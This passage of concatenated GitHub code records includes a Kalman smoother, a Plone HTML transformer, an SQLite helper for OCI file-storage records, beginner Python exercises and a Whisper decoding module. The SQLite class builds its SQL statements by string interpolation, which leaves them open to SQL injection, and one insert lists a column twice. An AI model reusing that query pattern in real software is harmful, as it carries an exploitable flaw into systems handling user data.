sig_k_[i] = (phi**2)*sig_k[i-1] + sigv\n\n # update gain\n C_k = sig_k_[i]/((h**2)*sig_k_[i] + sigg)\n\n # update posterior mode\n q = Q[i]\n m = M[i]\n r = R[i,:]\n\n diff = eps + 1\n x_k[i] = x_k_[i]\n while(diff > eps):\n\n p_k = np.exp(mu + eta * x_k[i])/ \\\n (1+np.exp(mu + eta * x_k[i]))\n\n lam_k = np.zeros_like(r)\n lam_k[0] = np.exp(psi + g*x_k[i])\n for S in range(1,len(c)):\n lam_k[S] = np.exp(psi + g*x_k[i] + \\\n np.dot(c[:S],r[:S]))\n for j in range(len(c),len(lam_k)):\n lam_k[j] = np.exp(psi + g*x_k[i] + \\\n np.dot(c,r[j-len(c):j]))\n\n\n rho = -x_k[i] + x_k_[i] + \\\n C_k*(h*(q - delta - h*x_k_[i]) + \\\n eta * sigg * (m - p_k)) + \\\n C_k * sigg * g * np.sum(r-lam_k*Del)\n\n d_rho = -1 - C_k*sigg*((eta**2)*p_k*(1-p_k) + \\\n (g**2)*np.sum(lam_k)*Del)\n\n x_k[i] = x_k[i] - rho/d_rho\n diff = np.abs(rho/d_rho)\n\n x[i] = x_k[i]\n\n p_k = np.exp(mu + eta * x_k[i])/ \\\n (1+np.exp(mu + eta * x_k[i]))\n\n lam_k = np.zeros_like(r)\n lam_k[0] = np.exp(psi + g*x_k[i])\n for S in range(1,len(c)):\n lam_k[S] = np.exp(psi + g*x_k[i] + \\\n np.dot(c[:S],r[:S]))\n for j in range(len(c),len(lam_k)):\n lam_k[j] = np.exp(psi + g*x_k[i] + \\\n np.dot(c,r[j-len(c):j]))\n\n sig_k[i] = 1/(1/sig_k_[i] + (h**2)/sigg + (eta**2)*p_k*(1-p_k) + (g**2)*np.sum(lam_k)*Del)\n\n for i in reversed(range(len(x)-1)):\n A_k = phi*(sig_k[i]/sig_k_[i+1])\n x[i] = x_k[i] + A_k*(x[i+1]-x_k_[i+1])\n\n return 
x\n","repo_name":"gabeschamberg/nonmarkov-timeseries-estimation","sub_path":"python/ssml_kalman.py","file_name":"ssml_kalman.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"10175525616","text":"################################################################\n# zopyx.smartprintng.plone\n# (C) 2011, ZOPYX Limited & Co. KG, D-72070 Tuebingen, Germany\n################################################################\n\n\"\"\" HTML transformation classes (based on lxml.html) \"\"\"\n\nimport os\nimport re\nimport urllib2\nimport cgi\nimport tempfile\nimport inspect\nimport uuid\nimport time\nimport lxml.html\n\nfrom lxml.cssselect import CSSSelector\nfrom Products.CMFCore.utils import getToolByName\n\n_marker = object()\nTRANSFORMATIONS = dict()\n\ndef registerTransformation(method):\n \"\"\" Decorator to register a method as a transformation\"\"\"\n name = method.__name__\n TRANSFORMATIONS[name] = method\n\ndef availableTransformations():\n return TRANSFORMATIONS.keys()\n\ndef hasTransformations(transformations):\n available_transformations = availableTransformations()\n for t in transformations:\n if not t in available_transformations:\n return False\n return True\n\nclass Transformer(object):\n\n def __init__(self, transformation_names, context=None, destdir=None):\n self.transformation_names = transformation_names\n self.context = context\n self.destdir = destdir\n\n def __call__(self, html, input_encoding=None, output_encoding=unicode, return_body=False):\n\n if not isinstance(html, unicode):\n if not input_encoding:\n raise TypeError('Input data must be unicode')\n html = unicode(html, input_encoding)\n\n html = html.strip()\n if not html:\n return u''\n\n root = lxml.html.fromstring(html)\n\n for name in self.transformation_names:\n method = TRANSFORMATIONS.get(name)\n params = dict(context=self.context,\n request=getattr(self.context, 'REQUEST', None),\n destdir=self.destdir,\n )\n if method is None:\n raise ValueError('No transformation \"%s\" registered' % name)\n\n ts = time.time()\n argspec = inspect.getargspec(method)\n if isinstance(argspec, tuple):\n args = argspec[0] # Python 2.4\n else:\n args = argspec.args\n if 'params' in args:\n method(root, params)\n else:\n method(root)\n\n if return_body:\n body = root.xpath('//body')[0]\n html_new = body.text + u''.join([lxml.html.tostring(b, encoding=output_encoding) for b in body])\n\n else:\n html_new = lxml.html.tostring(root, encoding=output_encoding)\n if html_new.startswith('
<div>') and html_new.endswith('</div>
    '):\n html_new = html_new[5:-6].strip()\n\n return html_new.strip()\n\ndef xpath_query(node_names, relative=True):\n if not isinstance(node_names, (list, tuple)):\n raise TypeError('\"node_names\" must be a list or tuple (not %s)' % type(node_names))\n if relative:\n return './/*[%s]' % ' or '.join(['name()=\"%s\"' % name for name in node_names])\n else:\n return '//*[%s]' % ' or '.join(['name()=\"%s\"' % name for name in node_names])\n\nALL_HEADINGS = ('h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'h7', 'h8', 'h9', 'h10')\nUUID4TAGS = ALL_HEADINGS + ('img', 'table', 'li', 'dt', 'ul', 'ol', 'dl')\n@registerTransformation\ndef addUUIDs(root, params, tags=UUID4TAGS):\n \"\"\" Add a unique/random UUID to all (specified) tags \"\"\"\n\n root.attrib['documentroot'] = '1'\n root.attrib['documentuid'] = params['context'].UID()\n\n for node in root.xpath(xpath_query(tags, relative=False)):\n node_id = node.get('id', _marker)\n if node_id is _marker:\n node.attrib['id'] = str(uuid.uuid4())\n","repo_name":"veit/vs.contentpopup","sub_path":"vs/contentpopup/subscribers/transformation.py","file_name":"transformation.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"131122156","text":"#\n# modules/db_fss.py\n#\n\nimport os\nimport sqlite3\n\nclass DbFss():\n def __init__(self, db_dir):\n fss_db_table = [\n '''\n CREATE TABLE IF NOT EXISTS fss_filesystem (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n region TEXT NOT NULL,\n compartment_id TEXT NOT NULL,\n name TEXT NOT NULL,\n ad TEXT NOT NULL, \n ocid TEXT NOT NULL UNIQUE ON CONFLICT IGNORE,\n owner TEXT NOT NULL,\n created_on TEXT NOT NULL\n );\n ''',\n '''\n CREATE TABLE IF NOT EXISTS fss_snapshot (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n region TEXT NOT NULL,\n ocid TEXT NOT NULL UNIQUE ON CONFLICT IGNORE,\n name TEXT NOT NULL, \n file_system_id TEXT NOT NULL,\n provenance_id TEXT NOT NULL,\n owner TEXT NOT NULL,\n created_on TEXT NOT NULL \n );\n ''', \n '''\n CREATE TABLE IF NOT EXISTS fss_mounttarget (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n region TEXT NOT NULL,\n compartment_id TEXT NOT NULL, \n name TEXT NOT NULL,\n ad TEXT NOT NULL,\n ocid TEXT NOT NULL UNIQUE ON CONFLICT IGNORE,\n subnet_id TEXT NOT NULL,\n owner TEXT NOT NULL,\n created_on TEXT NOT NULL \n );\n '''\n ] \n\n fss_db_file = db_dir + '/fss.db' \n \n if not os.path.isfile(fss_db_file):\n self.__conn = sqlite3.connect(fss_db_file)\n self.__cursor = self.__conn.cursor()\n \n for table in fss_db_table: \n self.__cursor.execute(table)\n else:\n self.__conn = sqlite3.connect(fss_db_file)\n self.__cursor = self.__conn.cursor()\n\n def add_filesystem(self, fss_fs_dict): \n dml = '''\n INSERT INTO fss_filesystem (region, compartment_id, name, ad, ocid, owner, created_on) \n VALUES (\"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\");\n ''' % (fss_fs_dict['region'], fss_fs_dict['compartment_id'], fss_fs_dict['name'], \n fss_fs_dict['ad'], fss_fs_dict['ocid'], fss_fs_dict['owner'], fss_fs_dict['created_on'],) \n\n self.__cursor.execute(dml)\n self.__conn.commit()\n\n return self.__cursor.lastrowid\n \n def add_snapshot(self, fss_snp_dict): \n dml = '''\n INSERT INTO fss_snapshot (region, ocid, name, owner, created_on, file_system_id, owner,\n provenance_id) \n VALUES (\"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\");\n ''' % (fss_snp_dict['region'], fss_snp_dict['ocid'], fss_snp_dict['name'], fss_snp_dict['owner'],\n fss_snp_dict['created_on'], 
fss_snp_dict['file_system_id'], fss_snp_dict['owner'],\n fss_snp_dict['provenance_id'],) \n\n self.__cursor.execute(dml)\n self.__conn.commit()\n\n return self.__cursor.lastrowid\n \n def add_mounttarget(self, fss_mt_dict): \n dml = '''\n INSERT INTO fss_mounttarget (region, compartment_id, name, ad, ocid, subnet_id,\n owner, created_on) \n VALUES (\"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\");\n ''' % (fss_mt_dict['region'], fss_mt_dict['compartment_id'], fss_mt_dict['name'], \n fss_mt_dict['ad'], fss_mt_dict['ocid'], fss_mt_dict['subnet_id'], fss_mt_dict['owner'],\n fss_mt_dict['created_on'],) \n\n self.__cursor.execute(dml)\n self.__conn.commit()\n\n return self.__cursor.lastrowid\n \n def list_filesystems(self, owner=None):\n if owner is not None:\n dml = ''' \n SELECT id, region, compartment_id, name, ad, ocid, owner, created_on \n FROM fss_filesystem WHERE owner LIKE \"%%%s\";\n ''' % (owner,) \n else:\n dml = '''\n SELECT id, region, compartment_id, name, ad, ocid, owner, created_on \n FROM fss_filesystem;\n '''\n\n self.__cursor.execute(dml)\n filesystems_list = self.__cursor.fetchall()\n\n return filesystems_list\n \n def list_snapshots(self, owner=None):\n if owner is not None:\n dml = ''' \n SELECT id, region, ocid, name, file_system_id, provenance_id, owner, created_on\n FROM fss_snapshot WHERE owner LIKE \"%%%s\";\n ''' % (owner,) \n else:\n dml = '''\n SELECT id, region, ocid, name, file_system_id, provenance_id, owner, created_on\n FROM fss_snapshot;\n '''\n\n self.__cursor.execute(dml)\n snapshots_list = self.__cursor.fetchall()\n\n return snapshots_list\n \n def list_mounttargets(self, owner=None):\n if owner is not None:\n dml = ''' \n SELECT id, region, compartment_id, name, ad, ocid, subnet_id, owner, \n created_on FROM fss_mounttarget WHERE owner LIKE \"%%%s\";\n ''' % (owner,) \n else:\n dml = '''\n SELECT id, region, compartment_id, name, ad, ocid, subnet_id, owner, \n created_on FROM fss_mounttarget;\n '''\n\n self.__cursor.execute(dml)\n mounttargets_list = self.__cursor.fetchall()\n\n return mounttargets_list\n \n def delete_filesystem(self, id):\n dml = '''\n DELETE FROM fss_filesystem WHERE id = %d;\n ''' % (id,)\n \n self.__cursor.execute(dml)\n self.__conn.commit()\n \n def delete_snapshot(self, id):\n dml = '''\n DELETE FROM fss_snapshot WHERE id = %d;\n ''' % (id,)\n \n self.__cursor.execute(dml)\n self.__conn.commit()\n \n def delete_mounttarget(self, id):\n dml = '''\n DELETE FROM fss_mounttarget WHERE id = %d;\n ''' % (id,)\n\n self.__cursor.execute(dml)\n self.__conn.commit()\n \n def close(self):\n self.__conn.close() \n","repo_name":"daniel-armbrust/oci-trashscan","sub_path":"modules/db_fss.py","file_name":"db_fss.py","file_ext":"py","file_size_in_byte":6361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7073697425","text":"\"\"\"https://www.codewars.com/kata/57a429e253ba3381850000fb\"\"\"\ndef bmi(weight, height):\n bmi = weight / height ** 2\n if bmi > 30:\n return 'Obese'\n elif bmi > 25:\n return 'Overweight'\n elif bmi > 18.5:\n return \"Normal\"\n else:\n return 'Underweight'\n","repo_name":"sieczkah/Codewars_KATA","sub_path":"8 kyu/Calculate BMI.py","file_name":"Calculate BMI.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"41029069773","text":"n=int(input(\"enter the range of the pattern\"))\nk=0\nfor i in range(1,n+1):\n k=k+1\n for j in range(1,i+1):\n 
if(j==i or j==n-(i+1)):\n print(k,end=' ')\n else:\n print(\" \",end=' ')\n print()\n","repo_name":"manmay2/PYTHON-PROGRAMMING","sub_path":"PROGRAMS/pattern53.py","file_name":"pattern53.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24913981861","text":"import copy\nimport numpy as np\n\nfrom dataclasses import dataclass, field\nfrom typing import Dict, List, Tuple, Iterable, Optional, Sequence, Union, Callable, TYPE_CHECKING\n\nimport torch\nimport torch.nn.functional as F\n\nfrom torch import Tensor\nfrom torch.distributions import Categorical\n\nfrom .audio import CHUNK_LENGTH\nfrom .tokenizer import Tokenizer, get_tokenizer\nfrom .utils import compression_ratio\n\nif TYPE_CHECKING: from .model import Whisper\n\nclass Inference:\n def __init__(self, model:\"Whisper\", initial_token_length:int, enable_cache:bool):\n self.model: \"Whisper\" = model\n self.initial_token_length = initial_token_length\n self.kv_cache = {} if enable_cache else None\n self.hooks = []\n\n def logits(self, tokens:Tensor, audio_features:Tensor, log_tensors:bool=False) -> Tensor:\n if self.kv_cache is not None:\n if not self.kv_cache:\n self.kv_cache, self.hooks = self.model.install_cache()\n if tokens.shape[-1] > self.initial_token_length: tokens = tokens[:, -1:]\n\n return self.model.decoder(\n tokens, \n audio_features, \n kv_cache=self.kv_cache, \n log_tensors=log_tensors\n )\n\n def cleanup_caching(self):\n for hook in self.hooks:\n hook.remove()\n\n self.kv_cache = {}\n self.hooks = []\n\n def rearrange_kv_cache(self, source_indices):\n for module, tensor in self.kv_cache.items():\n self.kv_cache[module] = tensor[source_indices].detach()\n\nclass LogitFilter:\n def apply(self, logits:Tensor, tokens:Tensor) -> None:\n raise NotImplementedError\n\nclass SuppressBlank(LogitFilter):\n def __init__(self, tokenizer:Tokenizer, sample_begin:int):\n self.tokenizer = tokenizer\n self.sample_begin = sample_begin\n\n def apply(self, logits:Tensor, tokens:Tensor):\n if tokens.shape[1] == self.sample_begin:\n logits[:, self.tokenizer.encode(\" \") + [self.tokenizer.eot]] = -np.inf\n\nclass SuppressTokens(LogitFilter):\n def __init__(self, suppress_tokens: Sequence[int]):\n self.suppress_tokens = list(suppress_tokens)\n\n def apply(self, logits:Tensor, tokens:Tensor):\n logits[:, self.suppress_tokens] = -np.inf\n\nclass ApplyTimestampRules(LogitFilter):\n def __init__(\n self, tokenizer:Tokenizer, sample_begin:int, max_initial_timestamp_index:Optional[int]\n ):\n self.tokenizer = tokenizer\n self.sample_begin = sample_begin\n self.max_initial_timestamp_index = max_initial_timestamp_index\n\n def apply(self, logits:Tensor, tokens:Tensor):\n if self.tokenizer.no_timestamps is not None:\n logits[:, self.tokenizer.no_timestamps] = -np.inf\n\n for k in range(tokens.shape[0]):\n seq = [t for t in tokens[k, self.sample_begin :].tolist()]\n last_was_timestamp = len(seq) >= 1 and seq[-1] >= self.tokenizer.timestamp_begin\n penultimate_was_timestamp = len(seq) < 2 or seq[-2] >= self.tokenizer.timestamp_begin\n\n if last_was_timestamp:\n if penultimate_was_timestamp: # has to be non-timestamp\n logits[k, self.tokenizer.timestamp_begin :] = -np.inf\n else: # cannot be normal text tokens\n logits[k, : self.tokenizer.eot] = -np.inf\n\n if tokens.shape[1] == self.sample_begin:\n logits[:, : self.tokenizer.timestamp_begin] = -np.inf\n\n if self.max_initial_timestamp_index is not None:\n last_allowed = self.tokenizer.timestamp_begin 
+ self.max_initial_timestamp_index\n logits[:, last_allowed + 1 :] = -np.inf\n\n logprobs = F.log_softmax(logits.float(), dim=-1)\n for k in range(tokens.shape[0]):\n timestamp_logprob = logprobs[k, self.tokenizer.timestamp_begin :].logsumexp(dim=-1)\n max_text_token_logprob = logprobs[k, : self.tokenizer.timestamp_begin].max()\n if timestamp_logprob > max_text_token_logprob:\n logits[k, : self.tokenizer.timestamp_begin] = -np.inf\n\nclass TokenDecoder:\n def reset(self): return\n\n def update(self, tokens:Tensor, logits:Tensor, sum_logprobs:Tensor) -> Tuple[Tensor, bool]:\n raise NotImplementedError\n\n def finalize(self, tokens:Tensor, sum_logprobs:Tensor) -> Tuple[Sequence[Sequence[Tensor]], List[List[float]]]:\n raise NotImplementedError\n\nclass GreedyDecoder(TokenDecoder):\n def __init__(self, temperature, eot):\n self.temperature = temperature\n self.eot = eot\n\n def update(self, tokens:Tensor, logits:Tensor, sum_logprobs:Tensor):\n if self.temperature <= 0: next_tokens = logits.argmax(dim=-1)\n else: next_tokens = Categorical(logits=logits/self.temperature).sample()\n\n logprobs = F.log_softmax(logits.float(), dim=-1)\n sum_logprobs += logprobs[torch.arange(logprobs.shape[0]), next_tokens] * (tokens[:, -1] != self.eot)\n next_tokens[tokens[:, -1] == self.eot] = self.eot\n return torch.cat([tokens, next_tokens[:, None]], dim=-1), (tokens[:, -1] == self.eot).all()\n\n def finalize(self, tokens:Tensor, sum_logprobs:Tensor):\n return F.pad(tokens, (0,1), value=self.eot), sum_logprobs.tolist()\n\n@torch.no_grad()\ndef detect_language(model:\"Whisper\", mel:Tensor, tokenizer:Tokenizer = None) -> Tuple[Tensor, List[dict]]:\n if tokenizer is None:\n tokenizer = get_tokenizer(model.is_multilingual)\n if tokenizer.language is None or tokenizer.language_token not in tokenizer.sot_sequence:\n raise ValueError(\"This model doesn't have language tokens\")\n\n single = mel.ndim == 2\n if single: mel = mel.unsqueeze(0)\n\n if mel.shape[-2:] != (model.dims.n_audio_ctx, model.dims.n_audio_state):\n mel = model.encoder(mel)\n\n n_audio = mel.shape[0]\n x = torch.tensor([[tokenizer.sot]] * n_audio).to(model.device)\n logits = model.logits(x, mel)[:, 0] ## grab the first from sequence\n\n mask = torch.ones(logits.shape[-1], dtype=torch.bool)\n mask[list(tokenizer.all_language_tokens)] = False\n logits[:, mask] = -np.inf\n language_tokens = logits.argmax(dim=-1)\n language_token_probs = logits.softmax(dim=-1).cpu()\n language_probs = [\n {\n c: language_token_probs[i, j].item()\n for j, c in zip(tokenizer.all_language_tokens, tokenizer.all_language_codes)\n }\n for i in range(n_audio)\n ]\n\n if single:\n language_tokens = language_tokens[0]\n language_probs = language_probs[0]\n\n return language_tokens, language_probs\n\ndef maximum_likelyhood_ranker(tokens:List[List[Tensor]], sum_logprobs:List[List[float]], length_penalty:Optional[float]):\n def scores(logprobs, lengths):\n result = []\n for logprob, length in zip(logprobs, lengths):\n if length_penalty is None: penalty = length\n else: penalty = ((5 + length) / 6) ** length_penalty\n result.append(logprob/penalty)\n return result\n\n lengths = [[len(t) for t in s] for s in tokens]\n return [np.argmax(scores(p,l)) for p, l in zip(sum_logprobs, lengths)]\n\n@dataclass\nclass DecodingOptions:\n task:str = \"transcribe\" # whether to perform X->X \"transcribe\" or X->English \"translate\"\n language:Optional[str] = None # language that the audio is in; uses detected language if None\n\n # sampling-related options\n temperature:float = 0.0\n 
sample_len:Optional[int] = None # maximum number of tokens to sample\n best_of:Optional[int] = None # number of independent samples to collect, when t > 0\n beam_size:Optional[int] = None # number of beams in beam search, when t == 0\n patience:Optional[float] = None # patience in beam search (https://arxiv.org/abs/2204.05424)\n\n # options for ranking generations (either beams or best-of-N samples)\n length_penalty:Optional[float] = None # \"alpha\" in Google NMT, None defaults to length norm\n sequence_ranker:Callable = maximum_likelyhood_ranker\n\n # prompt, prefix, and token suppression\n prompt:Optional[Union[str, List[int]]] = None \n prefix:Optional[Union[str, List[int]]] = None \n suppress_blank:bool = True \n suppress_tokens:Optional[Union[str, Iterable[int]]] = \"-1\"\n without_timestamps:bool = False\n max_initial_timestamp:Optional[float] = 1.0 \n fp16:bool = False\n log_tensors:bool = False\n enable_cache:bool = True\n\n@dataclass(frozen=True)\nclass DecodingResult:\n audio_features:Tensor\n language:str\n language_probs:Optional[Dict[str, float]] = None\n tokens:List[int] = field(default_factory=list)\n text:str = \"\"\n avg_logprob:float = np.nan\n no_speech_prob:float = np.nan\n temperature:float = np.nan\n compression_ratio:float = np.nan\n \n@torch.no_grad()\ndef decode(model:\"Whisper\", mel:Tensor, options:DecodingOptions = DecodingOptions()) -> Union[DecodingResult, List[DecodingResult]]:\n print(f\"decoding, task = {options.task}..\")\n\n def verify_options():\n if options.beam_size is not None and options.best_of is not None:\n raise ValueError(\"beam_size and best_of can't be given together\")\n if options.temperature == 0:\n if options.best_of is not None:\n raise ValueError(\"best_of with greedy sampling (T=0) is not compatible\")\n if options.patience is not None and options.beam_size is None:\n raise ValueError(\"patience requires beam_size to be given\")\n if options.length_penalty is not None and not (0 <= options.length_penalty <= 1):\n raise ValueError(\"length_penalty (alpha) should be a value between 0 and 1\")\n\n return True\n\n def get_audio_features(mel:Tensor) -> Tensor:\n if options.fp16: mel = mel.half()\n if mel.shape[-2:] != (model.dims.n_audio_ctx, model.dims.n_audio_state):\n audio_features = model.encoder(mel)\n\n if audio_features.dtype != (torch.float16 if options.fp16 else torch.float32):\n raise TypeError(f\"audio_features have incorrect dtype: {audio_features.dtype}\")\n return audio_features\n\n def get_initial_tokens() -> Tuple[int]:\n tokens = list(sot_sequence)\n prefix = options.prefix\n prompt = options.prompt\n\n if prefix: \n prefix_tokens = (\n tokenizer.encode(\" \" + prefix.strip()) if isinstance(prefix, str) else prefix\n )\n\n if sample_len is not None:\n prefix_tokens = prefix_tokens[-(n_ctx//2 - sample_len):]\n tokens = tokens + prefix_tokens\n\n if prompt: \n prompt_tokens = (\n tokenizer.encode(\" \" + prompt.strip()) if isinstance(prompt, str) else prompt \n )\n tokens = [tokenizer.sot_prev] + prompt_tokens[-(n_ctx//2 - 1):] + tokens\n\n return tuple(tokens)\n \n def get_suppress_tokens() -> Tuple[int]:\n suppress_tokens = options.suppress_tokens\n\n if isinstance(suppress_tokens, str):\n suppress_tokens = [int(t) for t in suppress_tokens.split(\",\")]\n\n if -1 in suppress_tokens:\n suppress_tokens = [t for t in suppress_tokens if t >= 0]\n suppress_tokens.extend(tokenizer.non_speech_tokens)\n elif suppress_tokens is None or len(suppress_tokens) == 0:\n suppress_tokens = [] # interpret empty string as an empty list\n 
else:\n assert isinstance(suppress_tokens, list), \"suppress_tokens must be a list\"\n\n suppress_tokens.extend(\n [tokenizer.sot, tokenizer.sot_prev, tokenizer.sot_lm]\n )\n if tokenizer.no_speech is not None: \n suppress_tokens.append(tokenizer.no_speech)\n\n return tuple(sorted(set(suppress_tokens)))\n\n def get_language(audio_features:Tensor, tokens:Tensor):\n languages = [options.language] * audio_features.shape[0]\n lang_probs = None\n\n if options.task == \"lang_id\" or options.language is None:\n lang_tokens, lang_probs = detect_language(model, audio_features, tokenizer)\n languages = [max(p, key=p.get) for p in lang_probs]\n if options.language is None:\n tokens[:, sot_index + 1] = lang_tokens\n\n return languages, lang_probs\n\n def main_loop(audio_features:Tensor, tokens:Tensor):\n assert audio_features.shape[0] == tokens.shape[0]\n n_batch = audio_features.shape[0]\n sum_logprobs = torch.zeros(n_batch, device=audio_features.device)\n no_speech_probs = [np.nan] * n_batch\n\n try:\n for i in range(sample_len):\n logits = inference.logits(tokens, audio_features, options.log_tensors)\n\n if i == 0 and tokenizer.no_speech is not None:\n probs_at_sot = logits[:, sot_index].float().softmax(dim=-1)\n no_speech_probs = probs_at_sot[:, tokenizer.no_speech].tolist()\n\n logits = logits[:, -1] ## consider the last token only\n\n for logit_filter in logit_filters:\n logit_filter.apply(logits, tokens)\n\n tokens, completed = decoder.update(tokens, logits, sum_logprobs)\n if tokens.shape[-1] > n_ctx or completed:\n break\n finally: \n inference.cleanup_caching()\n\n return tokens, sum_logprobs, no_speech_probs\n\n def run(mel:Tensor) -> List[DecodingResult]:\n decoder.reset()\n n_audio:int = mel.shape[0]\n audio_features:Tensor = get_audio_features(mel)\n tokens:Tensor = torch.tensor([initial_tokens]).repeat(n_audio, 1)\n\n languages, lang_probs = get_language(audio_features, tokens)\n if options.task == \"lang_id\":\n return [\n DecodingResult(\n audio_features=features, language=language, language_probs=probs\n ) for features, language, probs in zip(audio_features, languages, lang_probs)\n ]\n\n audio_features = audio_features.repeat_interleave(n_group, dim=0)\n tokens = tokens.repeat_interleave(n_group, dim=0)\n print([tokenizer.decode(t) for t in tokens])\n tokens, sum_logprobs, no_speech_probs = main_loop(audio_features, tokens)\n\n audio_features = audio_features[::n_group]\n no_speech_probs = no_speech_probs[::n_group]\n assert audio_features.shape[0] == len(no_speech_probs) == n_audio\n\n tokens = tokens.reshape(n_audio, n_group, -1)\n sum_logprobs = sum_logprobs.reshape(n_audio, n_group)\n tokens, sum_logprobs = decoder.finalize(tokens, sum_logprobs)\n\n tokens:List[List[Tensor]] = [\n [t[sample_begin:(t==tokenizer.eot).nonzero()[0,0]] for t in s] for s in tokens\n ]\n\n selected = sequence_ranker(tokens, sum_logprobs, options.length_penalty)\n tokens:List[List[int]] = [s[i].tolist() for i, s in zip(selected, tokens)] \n texts:List[str] = [tokenizer.decode(s).strip() for s in tokens]\n sum_logprobs:List[float] = [lp[i] for i, lp in zip(selected, sum_logprobs)]\n avg_logprobs:List[float] = [lp/(len(s)+1) for s, lp in zip(tokens, sum_logprobs)]\n\n fields = (texts, languages, tokens, audio_features, avg_logprobs, no_speech_probs)\n if len(set(map(len, fields))) != 1:\n raise RuntimeError(f\"inconsistent result lengths: {list(map(len, fields))}\")\n\n return [\n DecodingResult(\n audio_features=features,\n language=language,\n tokens=tokens,\n text=text,\n avg_logprob=avg_logprob,\n 
no_speech_prob=no_speech_prob,\n temperature=options.temperature,\n compression_ratio=compression_ratio(text)\n )\n for (text, language, tokens, features, avg_logprob, no_speech_prob) in zip(*fields)\n ]\n\n single = mel.ndim == 2\n if single: mel = mel.unsqueeze(0)\n\n assert verify_options()\n\n model = copy.deepcopy(model)\n\n language = options.language or \"en\"\n tokenizer:Tokenizer = get_tokenizer(model.is_multilingual, language=language, task=options.task)\n n_group:int = options.beam_size or options.best_of or 1\n n_ctx:int = model.dims.n_text_ctx\n sample_len:int = options.sample_len or model.dims.n_text_ctx // 2\n\n sot_sequence:Tuple[int] = tokenizer.sot_sequence\n if options.without_timestamps:\n sot_sequence = tokenizer.sot_sequence_including_notimestamps\n\n initial_tokens:Tuple[int] = get_initial_tokens()\n sample_begin:int = len(initial_tokens)\n sot_index:int = initial_tokens.index(tokenizer.sot)\n\n inference = Inference(model, len(initial_tokens), options.enable_cache)\n\n sequence_ranker = options.sequence_ranker\n\n '''if options.beam_size is not None:\n decoder = BeamSearchDecoder(options.beam_size, tokenizer.eot, inference, options.patience)\n else:''' \n \n decoder = GreedyDecoder(options.temperature, tokenizer.eot)\n\n logit_filters = []\n if options.suppress_blank:\n logit_filters.append(SuppressBlank(tokenizer, sample_begin))\n if options.suppress_tokens:\n logit_filters.append(SuppressTokens(get_suppress_tokens()))\n if not options.without_timestamps:\n precision = CHUNK_LENGTH / model.dims.n_audio_ctx # usually 0.02 seconds\n max_initial_timestamp_index = None\n if options.max_initial_timestamp:\n max_initial_timestamp_index = round(options.max_initial_timestamp / precision)\n logit_filters.append(\n ApplyTimestampRules(tokenizer, sample_begin, max_initial_timestamp_index)\n )\n\n result = run(mel)\n if single: result = result[0]\n\n del model\n return result \n\n\n\n\n\n","repo_name":"asceznyk/talk","sub_path":"talk/decoding.py","file_name":"decoding.py","file_ext":"py","file_size_in_byte":17624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3813398468","text":"\"\"\"\nBreak in Python Python break is generally used to terminate a loop. \nThis means whenever the interpreter encounters the break keyword, \nit simply exits out of the loop. 
Once it breaks out of the loop, \nthe control shifts to the immediate next statement.\n\"\"\"\n\n\n\"To Do: Predict, then Run, and then Investigate\"\n\n# Combining iteration and Selection\"\n\nnumList = [1, 3, 4, 6, 1, 3, 5, 7]\nfor number in numList:\n if (number == 30):\n print(\"found\", number)\n break\nelse:\n print(\"Number not found\")\n\n\n\"Modify/Make\"\n\"To Do: Task 1: You have been provided with a list of modules below, write a for loop similar to the one above to break out of the loop when 'Python' is found\"\n# Refer to the code above to gide you in completing this task\n\ncourse_list = ['html', 'css', 'sql', 'python', 'javascript']\n\nfor course in course_list:\n if course == 'python':\n print('Just found Python!')\n break\n else:\n print('Couldnt find it :(')\n","repo_name":"agundogdu99/JustIT-Bootcamp","sub_path":"Python/Part3_IterationStartingFiles/1_forLoops/3_forList3.py","file_name":"3_forList3.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10315946310","text":"# An example of higher-order gradients computation\n\nimport torch\nfrom torch.autograd import grad\n\ndef nth_derivative(f, wrt, n):\n\n for i in range(n):\n\n grads = grad(f, wrt, create_graph=True)[0]\n f = grads.sum()\n\n return grads\n\nx = torch.arange(4., requires_grad=True).reshape(2, 2)\nloss = (x ** 4).sum()\n\nprint(nth_derivative(f=loss, wrt=x, n=3))","repo_name":"DefIntpMan/ATEX","sub_path":"src/0_toy.py","file_name":"0_toy.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"71182641058","text":"# zadanie 1.1\n\nhello = \"Hello\"\nstudent = \"Ola\"\n\nprint(\"{}\".format(hello)+\" {}\".format(student))\n\n# zadanie 1.2\n\nstudent = input(\"Wpisz swoje imie \")\n\nprint(\"Hello \"+student)\n\n# zadanie 1.3\n\nstudenci = [\"Ania\", \"Kuba\", \"Piotr\", \"Jan\"]\n\nliczba_studentow = len(studenci)\nprint(\"Liczba studentow wynosi: \" + str(liczba_studentow))\n\n# zadanie 1.4\n\nstudenci = [\"Ania\", \"Kasia\", \"Piotr\", \"Tomek\"]\n\nfor i in range(len(studenci)):\n print(\"Hello \"+ studenci[i])\n\n# zadanie 1.5\n\nliczba = 3\npotega = 4\n\nwynik = liczba**potega\n\nprint(\"Wynik wynosi: \" +str(wynik))\n\n# zadanie 1.6\n\nciag_znakow = \"edbw(hdakqas(skqskahb))adwndwb(wgwidn()dsqwhjdw)\"\nnawias = 